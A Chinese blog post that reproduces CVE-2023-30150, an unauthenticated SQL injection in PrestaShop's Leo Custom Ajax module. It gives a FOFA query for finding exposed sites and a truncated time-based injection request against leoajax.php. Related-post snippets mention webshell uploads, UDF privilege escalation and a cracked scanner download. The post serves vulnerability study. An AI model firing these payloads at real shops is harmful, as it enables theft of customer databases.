PrestaShop购物系统 SQL注入漏洞复现(CVE-2023-30150)

最新推荐文章于 2025-07-06 15:26:02 发布
最新推荐文章于 2025-07-06 15:26:02 发布
阅读量1.5k 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135707859
本文详细介绍了PrestaShop购物系统中的一个SQL注入漏洞(CVE-2023-30150),该漏洞源于Leo Custom Ajax模块,允许未授权攻击者通过GET参数执行SQL注入,影响系统安全性。复现环境为含有'modules/leocustomajax'的站点,文中提供了PoC和修复建议,建议用户关注厂商更新修复此漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

PrestaShop 是一个功能丰富,基于 PHP5 开发的 Web2.0 网上购物系统。PrestaShop 具有可定制,稳定等特点。整个系统只有 5.8MB,易于快速安装。

0x02 漏洞概述

PrestaShop 的部分主题中使用Leo Custom Ajax模块拓展,Leo Custom Ajax模块中可以在/modules/leocustomajax/leoajax.php中使用多个 GET 参数(cat_list、pro_info、pro_add、pro_cdown、pro_color)来操作HTTP请求,使未经身份验证的远程攻击者能够执行 SQL 注入,控制数据库权限获取敏感信息。

0x03 复现环境

FOFA:"modules/leocustomajax"

0x04 漏洞复现

PoC

GET /modules/leocustomajax/leoajax.php?cat_list=1%29;select+0x73656c65637420736c6565702835293b+into+@a;prepare+b+from+
了解本专栏 订阅专栏 解锁全文 超级会员免费看
CuppaCMS 文件上传漏洞复现(CVE-2020-26048)
玄道的网安博客
12-18 2787
0X00简介 CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。 0X01影响范围 CuppaCMS全版 0X02漏洞复现 在File Mangager功能中的rename功能是通过前端js进行的,导致rename功能可以,抓包绕过,改为.php后缀,导致webshell \js\filema
PrestaShop 网站漏洞修复如何修复
网站安全专家
01-01 455
PrestaShop网站的漏洞越来越多,该网站系统是很多外贸网站在使用的一个开源系统,从之前的1.0初始版本到现在的1.7版本,经历了多次的升级,系统使用的人也越来越多,国内使用该系统的外贸公司也很多,PrestaShop扩展性较高,模板也多,多种货币自由切换,并支持信用卡以及paypal支付,是外贸网站的首选。就在最近几天,PrestaShop被爆出有远程代码注入漏洞,该漏洞影响范围较光,危害较...
开源电商平台 PrestaShop 0day被用于窃取在线商店的支付数据
smellycat000的专栏
07-26 321
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士恶意人员正在利用开源 PrestaShop 电商平台上的一个0day,注入恶意skimmer 代码窃取敏感信息。PrestaShop 公司在7月22日发布安全公告指出,“攻击者找到利用一个安全漏洞在运行 PrestaShop 网站的服务器上执行任意代码的方式。”PrestaShop 声称是欧洲和拉美地区领先的电商解决方案...
wordpress 垂直越权(CVE=2021-21389)漏洞复现详细教程
hp.puppy的博客
04-18 2406
wordpress 垂直越权(CVE=2021-21389)漏洞复现详细教程 wordpress 注册绕过 wordpress 提权admin wordpress 文件上传
数据库提权
weixin_43873557的博客
02-10 1031
01. Mysql提权 Mysql提权一 user defined function,用户定义函数,为用户提供了一种高效创建函数的方式攻击者编写调用系统cmd命令(linux下相当于调用shell命令)的udf.dll文件,并将udf.dll导出到指定目录下,攻击者创建一个指向udf.dll的自定义函数func,每次在数据库查询中执行func函数等价于在cmd命令中执行命令。 Windows2003:C:\windows MySQL 5.1版本后:mysql安装目录\lib\plugin\目录下 在MySQ
收集有哪些常见的cms以及对应cms的历史漏洞
m0_46390077的博客
11-24 438
Magento: 这是一个专门用于电子商务的CMS系统,过去发现的漏洞包括目录穿越,任意文件上传,SQL注入,跨站点脚本攻击等。Drupal: 这是一个强大的CMS平台,历史上曾出现过的漏洞包括SQL注入,跨站点脚本攻击,路径遍历,访问控制漏洞等。: 这也是一个广泛使用的CMS系统,过去的漏洞包括未经验证的文件上传,SQL注入,跨站点脚本攻击等。Blogger:Blogger是一个免费的博客平台,由Google提供,适用于个人博客和简单的网站。
低权限SQL注入至RCE+权限绕过
若有战,召必回
11-16 1071
Zabbix低权限SQL注入至RCE+权限绕过,可惜没找到关于传webshell的好方法,如有大神告知,感激万分!2.3 利用获取到的管理员session id和session key构造zbx_session登录管理界面。他也提到了无法直接echo写马,但是他当时遇到的环境是存在pkexec的,所以有了后续的利用。解压之后,vmware直接打开vmx文件,默认账号密码是root/zabbix。就不花时间仔细调试了,问题出在如下位置,各位自己花点时间,自己琢磨琢磨。
90%的网站都遇到过这个漏洞SQL注入攻击,你中招了吗?从零基础到精通,收藏这篇就够了!
Javachichi的博客
02-24 1380
SQL 注入攻击是 Web 网络系统上非常常见的一种攻击!黑客通过将恶意的 SQL 查询或者添加语句插入到应用的输入参数中,然后在后台 SQL 服务器上解析执行进行程序攻击!哪黑客具体是如何将恶意的 SQL 脚本进行植入到系统中,从而达到攻击的目的呢?现在的 Web 程序基本都是三层架构,也就是我们常说的 MVC 模式:表示层:用于数据的展示,也就是前端界面业务逻辑层:用于接受前端页面传入的参数,进行逻辑处理。
prestashop-exploits:PrestaShop Cookie漏洞的exploitsPOC集合(CVE-2018-13784)
04-30
prestashop漏洞 PrestaShop Cookie漏洞漏洞/ POC集合(CVE-2018-13784) 有关详细信息,请参阅 。
PrestaShop Cookie漏洞详细POC集(CVE-2018-13784)
CVE-2018-13784是一个特定的漏洞,它影响了PrestaShop的Cookie处理机制,允许攻击者执行未授权的代码执行或获取敏感信息。 在这个上下文中,提到的PrestaShop Cookie漏洞的exploits POC(Proof of Concept,概念...
PrestaShop 开源网店系统-PHP
06-25
<p>PrestaShop是一款针对web2.0设计的全功能、跨平台的免费开源电子商务解决方案,自08年1.0...</p><p> </p><p>PrestaShop是一个功能丰富,基于PHP5开发的Web2.0网上购物系统PrestaShop具有可定制,稳定等特点。</p>
xray1.9.4高级社区版下载
qq_49869351的博客
01-12 8123
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4版本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
PrestaShop开发者指南 第三篇 设置本地安装环境
weixin_34111790的博客
01-04 369
## 环境要求 - Unix, Linux 或 Windows - Web服务器:Apache 1.3 或更高的版本 - PHP:5.2或更高版本 - MySQL:5.0或更高版本 PrestaShop也可以在Microsoft的 IIS Web server 6.0或更高版本,及nginx 1.0或更高版本上运行。 这些软件不愿意一个个安装的话,可以选择AMP集成包: - XAMPP...
HVV前最后一波—2025攻防演练必修高危漏洞清单_漏洞cnvd-2025-10031
最新发布
shandongjiushen的博客
07-06 916
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
深入PrestaShop核心开发
I Am Nothing
05-09 843
1.数据库结构表名都是以_ps前缀开头,这个可以再安装过程中进行指定所有表名是小写的,单词用下划线_分割当一个表建立了两个实体的连接,两个实体的名字会再表名中被提到,举个例子。ps_category_product连接了商品和他们的分类一些细节;用id_lang 字段存储语言关联一条记录用id_shop字段存储商店关联一条记录表包含翻译必须用_lang结尾, 例如ps_product_lang...
常见的cms以及对应cms的历史漏洞
weixin_58155715的博客
11-28 874
OpenCart:OpenCart 是一款免费的电商 CMS,也曾出现过多个漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal:Drupal 是一款强大的 CMS,但也曾经出现过多个漏洞,包括 SQL 注入、跨站脚本、文件包含等。WordPress:这是最流行的 CMS,曾出现过许多漏洞,包括 SQL 注入、XSS、CSRF、权限提升等。Joomla:这款 CMS 曾经出现过一些严重的漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal 7.24 版本中的 SQL 注入漏洞
安全攻防六:SQL注入,明明设置了强密码,为什么还会被别人登录
运维大湿兄的博客
04-11 1549
在正文之前,让我们先来看一个案例。某天,当你在查看应用的管理后台时,发现有很多异常的操作。接着,你很快反应过来了,这应该是黑客成功登录了管理员账户。于是,你立刻找到管理员,责问他是不是设置了弱密码。管理员很无辜地表示,自己的密码非常复杂,不可能泄漏,但是为了安全起见,他还是立即修改了当前的密码。奇怪的是,第二天,黑客还是能够继续登录管理员账号。问题来了,黑客究竟是怎么做到的呢?你觉得这里面的问题究...
WordPress插件SQL注入漏洞——漏洞复现
热门推荐
W小哥
11-25 1万+
复现过程 环境地址:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 访问目标网站 常规工具AWVS扫描是扫不出来漏洞的 第一步识别CMS vulnx -u http://219.153.49.228:47712/ --cms wpscan --url http://219.153.49.228:47712/ 给API的token才能将结果输出 ...
网络安全SQL 注入漏洞_cve-2021-1636
2401_84215240的博客
08-26 997
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值